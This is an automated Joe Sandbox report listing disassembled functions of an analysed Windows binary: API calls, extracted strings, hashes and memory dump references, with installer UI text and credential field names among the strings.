                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$LocalSystem__ftol_wctomb_s
                                                                                  • String ID: `date' format too long$day$hour$isdst$min$month$sec$wday$yday$year
                                                                                  • API String ID: 667603400-2335568655
                                                                                  • Opcode ID: 2c0e3f41a8b273ede04ff5c4ba41b961c0be07776424e337bcd465269f9b073f
                                                                                  • Instruction ID: 5937b14468f23390398eff1e5af1769c89a76d4be87a49388897db95451fadbb
                                                                                  • Opcode Fuzzy Hash: 2c0e3f41a8b273ede04ff5c4ba41b961c0be07776424e337bcd465269f9b073f
                                                                                  • Instruction Fuzzy Hash: 1341BEF16402053BF620FA75ECC3EEF765CEBC0714F00491EF99556282EABEA94143A9
                                                                                  Function 0041D0AF Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 114COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: 0:R$MSG_CLOSING_CONNECTION$MSG_CONNECTED_TO_SERVER$MSG_CONNECTING_TO_SERVER$MSG_CONNECTION_CLOSED$MSG_HOST_NAME_RESOLVED$MSG_REDIRECTING$MSG_RESOLVING_HOST_NAME$MSG_STATUS_HANDLE_CLOSING$MSG_STATUS_HANDLE_CREATED$MSG_STATUS_REQUEST_COMPLETE
                                                                                  • API String ID: 3519838083-2730749719
                                                                                  • Opcode ID: 89af7a118f737b00c42fc0a8ae5f80ae8aac877fc64b75d0869379221b6ea59d
                                                                                  • Instruction ID: 941465b9733303c451598e1dbf81e9d62b9bcd71080c7c9a46195f14697e0d72
                                                                                  • Opcode Fuzzy Hash: 89af7a118f737b00c42fc0a8ae5f80ae8aac877fc64b75d0869379221b6ea59d
                                                                                  • Instruction Fuzzy Hash: 4231B1B0D10614BADB28CF58C989DEFBB64AB02750F60855FE402A7290C37C9EC1C69E
                                                                                  Function 00458DBD Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 81COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00458DC2
                                                                                    • Part of subcall function 00458F9F: __EH_prolog.LIBCMT ref: 00458FA4
                                                                                    • Part of subcall function 00458F9F: CreateFontIndirectA.GDI32(FFFFFFF3), ref: 00459038
                                                                                  • GetSysColor.USER32(00000008), ref: 00458E8B
                                                                                  • GetSysColor.USER32(00000014), ref: 00458E92
                                                                                  • GetSysColor.USER32(00000010), ref: 00458E99
                                                                                  • GetSysColor.USER32(00000015), ref: 00458EA0
                                                                                  • GetSysColor.USER32(00000016), ref: 00458EA7
                                                                                  • GetSysColor.USER32(00000011), ref: 00458EAE
                                                                                  • GetSysColor.USER32(00000008), ref: 00458EB5
                                                                                  • GetSysColor.USER32(00000008), ref: 00458EBC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$H_prolog$CreateFontIndirect
                                                                                  • String ID: 9M$13M$BUTTON
                                                                                  • API String ID: 3895053712-89341617
                                                                                  • Opcode ID: abff6fa2d95dea14876e7d2475d3a240a705ed89493920820cf03d4f7d2333d6
                                                                                  • Instruction ID: bcf147ed6797a9f498685932056ce730893fa1d3bcf8d8993f9a56227fcdf1a9
                                                                                  • Opcode Fuzzy Hash: abff6fa2d95dea14876e7d2475d3a240a705ed89493920820cf03d4f7d2333d6
                                                                                  • Instruction Fuzzy Hash: DE310AB0900B849ED720DF768985B8AFFF0FF58704F41886ED19A9B691DBB5A504CF40
                                                                                  Function 00440A40 Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 429COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00440A45
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                  • __ftol.LIBCMT ref: 00440AB1
                                                                                  • __ftol.LIBCMT ref: 00440AE6
                                                                                  • __ftol.LIBCMT ref: 00440B1B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog__ftol
                                                                                  • String ID: 0:R$P$PPassword$PServerAddress$PUserName$Password$UserName
                                                                                  • API String ID: 2123048387-3909543088
                                                                                  • Opcode ID: 9e246c428cab53e047da452639eec7834628c60a719ab49924a4789e6ef9a572
                                                                                  • Instruction ID: c5f0b79ad7f6abfd01c2bea4fda5df8cf40422b8ff3bbb9905142f2ac86fd7e8
                                                                                  • Opcode Fuzzy Hash: 9e246c428cab53e047da452639eec7834628c60a719ab49924a4789e6ef9a572
                                                                                  • Instruction Fuzzy Hash: 87D1E335908205A9FB08B7A6DC52FFE76389F12728F20051FF601B51D2EF7C5A52962E
                                                                                  Function 0046C4F8 Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 90COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0046C4FD
                                                                                    • Part of subcall function 004688E5: __EH_prolog.LIBCMT ref: 004688EA
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                    • Part of subcall function 0045FEA5: __EH_prolog.LIBCMT ref: 0045FEAA
                                                                                  Strings
                                                                                  • Make shortcuts available to all users, xrefs: 0046C5AC
                                                                                  • Install shortcuts for current user only, xrefs: 0046C579
                                                                                  • IDS_CTRL_STATICTEXT_TOPINSTRUCTIONS, xrefs: 0046C52A
                                                                                  • Shortcut Folder:, xrefs: 0046C546
                                                                                  • IDS_CTRL_RADIOBTN_PERUSER, xrefs: 0046C590
                                                                                  • The shortcut icons will be created in the folder indicated below. If you don't want to use the default folder, you can either type a new name, or select an existing folder from the list., xrefs: 0046C516
                                                                                  • IDS_CTRL_COMBOBOX_SHORTCUTFOLDERS, xrefs: 0046C5F6
                                                                                  • %AppShortcutFolderName%, xrefs: 0046C5DF
                                                                                  • IDS_CTRL_RADIOBTN_ALLUSERS, xrefs: 0046C5C3
                                                                                  • IDS_CTRL_STATICTEXT_LABEL_01, xrefs: 0046C55D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$lstrlen
                                                                                  • String ID: %AppShortcutFolderName%$IDS_CTRL_COMBOBOX_SHORTCUTFOLDERS$IDS_CTRL_RADIOBTN_ALLUSERS$IDS_CTRL_RADIOBTN_PERUSER$IDS_CTRL_STATICTEXT_LABEL_01$IDS_CTRL_STATICTEXT_TOPINSTRUCTIONS$Install shortcuts for current user only$Make shortcuts available to all users$Shortcut Folder:$The shortcut icons will be created in the folder indicated below. If you don't want to use the default folder, you can either type a new name, or select an existing folder from the list.
                                                                                  • API String ID: 3243491680-1364183510
                                                                                  • Opcode ID: a6b6c61d03f4ca76ea35b15e6d5ae3995b9d42fa2eb3fc4842eee1967b6da1d6
                                                                                  • Instruction ID: ccb8799adeed2a51f35749a3196474a1a389b5bf558dac29c4efb1e1255f382f
                                                                                  • Opcode Fuzzy Hash: a6b6c61d03f4ca76ea35b15e6d5ae3995b9d42fa2eb3fc4842eee1967b6da1d6
                                                                                  • Instruction Fuzzy Hash: 8D318BB4625709B7DB08BB5AC907ADE7EB4AF45B64F10420EF011632D2CB75174085EB
                                                                                  Function 004A0990 Relevance: 18.1, APIs: 12, Instructions: 87filestringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • TlsGetValue.KERNEL32(0000001C,?), ref: 004A099D
                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004A09C3
                                                                                    • Part of subcall function 004A1F10: TlsGetValue.KERNEL32(0000001C,?,00000000,?,00000000,004A0AEA,00000065,00000000,00000104), ref: 004A1F1A
                                                                                    • Part of subcall function 004A1F10: lstrcpy.KERNEL32(00000000,00523A30), ref: 004A1F3E
                                                                                  • lstrcpyn.KERNEL32(?,00000000,?,00000104), ref: 004A09E3
                                                                                  • lstrcat.KERNEL32(?,00510870), ref: 004A0A04
                                                                                  • lstrcat.KERNEL32(?,?), ref: 004A0A13
                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,00000104), ref: 004A0A2C
                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000318,00000000,?,00000104), ref: 004A0A42
                                                                                  • WriteFile.KERNEL32(00000000,00511394,00000002,?,00000000,?,00000104), ref: 004A0A5D
                                                                                  • lstrlen.KERNEL32(?,?,00000000,?,00000104), ref: 004A0A6E
                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000104), ref: 004A0A77
                                                                                  • WriteFile.KERNEL32(00000000,00511394,00000002,?,00000000,?,00000104), ref: 004A0A88
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000104), ref: 004A0A8B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Write$Valuelstrcat$CloseCreateDirectoryHandlePointerWindowslstrcpylstrcpynlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3960242371-0
                                                                                  • Opcode ID: b0bd460c93b43f10fbb35235c7ed9f2e226f1bf64a41e7597b5cd37ac4d247b2
                                                                                  • Instruction ID: b0b316e7fcd3fa58e7816bf0b84c32f351f63135d6f55a482bb6d2f4a839117b
                                                                                  • Opcode Fuzzy Hash: b0bd460c93b43f10fbb35235c7ed9f2e226f1bf64a41e7597b5cd37ac4d247b2
                                                                                  • Instruction Fuzzy Hash: 79213B752403457FE220DB50DC8AFEB776CEB94B50F018928F754AA1D1D7B464058BA9
                                                                                  Function 004D1369 Relevance: 18.1, APIs: 10, Strings: 2, Instructions: 73stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004C93E0: GetWindowLongA.USER32(?,000000F0), ref: 004C93EC
                                                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 004D139D
                                                                                  • lstrlen.KERNEL32(00000000,:%d,?), ref: 004D13B7
                                                                                  • wsprintfA.USER32 ref: 004D13C5
                                                                                  • lstrcat.KERNEL32(00000000, - ), ref: 004D13DA
                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 004D13E9
                                                                                  • lstrcpy.KERNEL32(?,?), ref: 004D13FA
                                                                                  • lstrcat.KERNEL32(?, - ), ref: 004D1418
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 004D1424
                                                                                  • lstrlen.KERNEL32(?,:%d,?), ref: 004D143A
                                                                                  • wsprintfA.USER32 ref: 004D1448
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcat$lstrcpylstrlenwsprintf$LongWindow
                                                                                  • String ID: - $:%d
                                                                                  • API String ID: 3078587954-2359489159
                                                                                  • Opcode ID: e020be14389b7318c8b62c11a33129c0436405f5670d11d481d47fbcec8833dd
                                                                                  • Instruction ID: 2c8ea476731f2a6f919b0274ce1b1807d33207ca9f4daa0a345ca6e35eb2723e
                                                                                  • Opcode Fuzzy Hash: e020be14389b7318c8b62c11a33129c0436405f5670d11d481d47fbcec8833dd
                                                                                  • Instruction Fuzzy Hash: E92160B590035EABDF20BB65DD8CF8A77BCAB10344F018466EA15D2162D278EA44CF58
                                                                                  Function 00434A0E Relevance: 18.0, APIs: 5, Strings: 5, Instructions: 470COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00434A13
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 0041F1C0: __EH_prolog.LIBCMT ref: 0041F1C5
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                    • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                  • __ftol.LIBCMT ref: 00434BEF
                                                                                  • __ftol.LIBCMT ref: 00434C16
                                                                                  • __ftol.LIBCMT ref: 00434DA9
                                                                                    • Part of subcall function 0041EDCC: __EH_prolog.LIBCMT ref: 0041EDD1
                                                                                    • Part of subcall function 004C6033: lstrlen.KERNEL32(?,?,00000000,004C5E52,005247C8,00403DCA,00000000,00403C1B,00000000,00000000,004019FC,?), ref: 004C6044
                                                                                  • __ftol.LIBCMT ref: 00434D1C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$__ftol$Interlocked$Incrementlstrlen$Decrement
                                                                                  • String ID: 0:R$alt$ctrl$keycode$shift
                                                                                  • API String ID: 36383070-2511585862
                                                                                  • Opcode ID: b70884661b55cc2d7b81174ba8f50059e744217bffcd78c1cbbb3a722b64ca41
                                                                                  • Instruction ID: 76aa5a0cd1dc19bebe1d2a2a5deef0c92b4fbf5ac2c7ee51af8cfdb5c8aaeb48
                                                                                  • Opcode Fuzzy Hash: b70884661b55cc2d7b81174ba8f50059e744217bffcd78c1cbbb3a722b64ca41
                                                                                  • Instruction Fuzzy Hash: D0E1D539805248BDEB09FBA5D846FEE7BA89F15318F20401FF501761C2EF7C6B858669
                                                                                  Function 00440F42 Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 429COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00440F47
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                  • __ftol.LIBCMT ref: 00440FB3
                                                                                  • __ftol.LIBCMT ref: 00440FE8
                                                                                  • __ftol.LIBCMT ref: 0044101D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog__ftol
                                                                                  • String ID: 0:R$PPassword$PServerAddress$PUserName$Password$UserName
                                                                                  • API String ID: 2123048387-501260498
                                                                                  • Opcode ID: 3aec53fe9861007bdaf257ab5b10064941136d12c6e7c08bcdbb14daa0edd972
                                                                                  • Instruction ID: fe25874d45165cc49f5735aeb791c9a64e51198cc83ba0903f34057d5a6ad234
                                                                                  • Opcode Fuzzy Hash: 3aec53fe9861007bdaf257ab5b10064941136d12c6e7c08bcdbb14daa0edd972
                                                                                  • Instruction Fuzzy Hash: 0BD1F635908215A9FB14BBA6DC46FFE77389F12B24F20011FF501B51E2DF6C5A82962E
                                                                                  Function 0044039E Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 343COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004403A3
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 0041F1C0: __EH_prolog.LIBCMT ref: 0041F1C5
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  • __ftol.LIBCMT ref: 00440435
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                    • Part of subcall function 0041EDCC: __EH_prolog.LIBCMT ref: 0041EDD1
                                                                                  • __ftol.LIBCMT ref: 0044045C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Interlocked__ftol$DecrementIncrementlstrlen
                                                                                  • String ID: 0:R$P$PPassword$PServerAddress$PUserName$Password$UserName
                                                                                  • API String ID: 439246406-3909543088
                                                                                  • Opcode ID: 07bca6b5a83fba1956f643b9bd73657a45c9388a111a1786a1189b6ba1285219
                                                                                  • Instruction ID: bd03b0adc0f9ea16d523466af6f3f46c9776e3ac3697456ec47dd83fc5c531b1
                                                                                  • Opcode Fuzzy Hash: 07bca6b5a83fba1956f643b9bd73657a45c9388a111a1786a1189b6ba1285219
                                                                                  • Instruction Fuzzy Hash: 73B17D75805619A9EB09FBA6DC42FEE7B689F26318F10005FF501B21C2EF7C1B46866D
                                                                                  Function 004201E1 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 191COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004201E6
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 0042020C
                                                                                    • Part of subcall function 0041EDCC: __EH_prolog.LIBCMT ref: 0041EDD1
                                                                                  • __ftol.LIBCMT ref: 00420381
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  • IsWindow.USER32(?), ref: 004203AA
                                                                                  • InvalidateRect.USER32(?,-00000018,00000001), ref: 004203C8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$__ftol$DecrementInterlockedInvalidateRectWindow
                                                                                  • String ID: Enabled$Selected$Sorted$Text$Visible
                                                                                  • API String ID: 3448736364-2696731559
                                                                                  • Opcode ID: 149af4aec8e82252b51daaf9a8c46e4ff84464dcf3dc9c1619b6064ec9e3169a
                                                                                  • Instruction ID: 7eb0b97744bd8fdcfe71428d0a1babc3e647d09180e7fb14c7feff6e49657f8d
                                                                                  • Opcode Fuzzy Hash: 149af4aec8e82252b51daaf9a8c46e4ff84464dcf3dc9c1619b6064ec9e3169a
